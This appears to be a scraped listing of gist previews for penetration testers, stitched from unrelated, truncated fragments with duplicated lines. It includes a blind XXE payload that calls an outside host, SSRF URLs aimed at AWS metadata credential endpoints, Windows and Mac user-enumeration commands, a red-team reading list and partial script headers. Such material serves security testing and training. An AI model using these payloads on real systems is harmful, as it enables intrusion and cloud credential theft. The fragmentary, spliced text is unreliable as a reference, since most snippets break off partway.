Using Requests and Beautiful Soup, with the most recent Beautiful Soup 4 docs.
Install our tools (preferably in a new virtualenv):
pip install beautifulsoup4
Using Requests and Beautiful Soup, with the most recent Beautiful Soup 4 docs.
Install our tools (preferably in a new virtualenv):
pip install beautifulsoup4
#!/usr/bin/env python | |
# Author - Vivek Ramachandran | |
# | |
# Website - http://securitytube.net | |
# | |
# Python for Hackers: http://securitytube-training.com/online-courses/securitytube-python-scripting-expert/ | |
# | |
# License: Use as you please for non-commercial purposes. | |
# |
WebSockets is a modern HTML5 standard which makes communication between client and server a lot more simpler than ever. We are all familiar with the technology of sockets. Sockets have been fundamental to network communication for a long time but usually the communication over the browser has been restricted. The general restrictions
-------------------------------------------------------------- | |
Vanilla, used to verify outbound xxe or blind xxe | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> |
#!/usr/bin/env python | |
""" | |
Name: extract_java_server_faces_viewstate | |
Purpose: Extract and parse the Java Server Faces viewstate | |
Date: 20150620 | |
Author: Don C. Weber (@cutaway) of InGuardians, Inc. | |
Resources: | |
http://wiki.apache.org/myfaces/Secure_Your_Application |
## IPv6 Tests | |
http://[::ffff:169.254.169.254] | |
http://[0:0:0:0:0:ffff:169.254.169.254] | |
## AWS | |
# Amazon Web Services (No Header Required) | |
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy | |
http://169.254.169.254/latest/user-data | |
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] |
From: http://redteams.net/bookshelf/ | |
Techie | |
Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp. | |
Social Engineering: The Art of Human Hacking by Christopher Hadnagy | |
Practical Lock Picking: A Physical Penetration Tester's Training Guide by Deviant Ollam | |
The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick | |
Hacking: The Art of Exploitation by Jon Erickson and Hacking Exposed by Stuart McClure and others. | |
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Fyodor | |
The Shellcoder's Handbook: Discovering and Exploiting Security Holes by several authors |
Domain: TEST.local | |
User Enumeration: | |
Windows: | |
net user | |
net user /domain | |
net user [username] | |
net user [username] /domain | |
wmic useraccount | |
Mac: | |
dscl . ls /Users |
#!/bin/bash | |
# Usage : ./scanio.sh <save file> | |
# Example: ./scanio.sh cname_list.txt | |
# Premium | |
function ech() { | |
spinner=( "|" "/" "-" "\\" ) | |
while true; do | |
for i in ${spinner[@]}; do | |
echo -ne "\r[$i] $1" |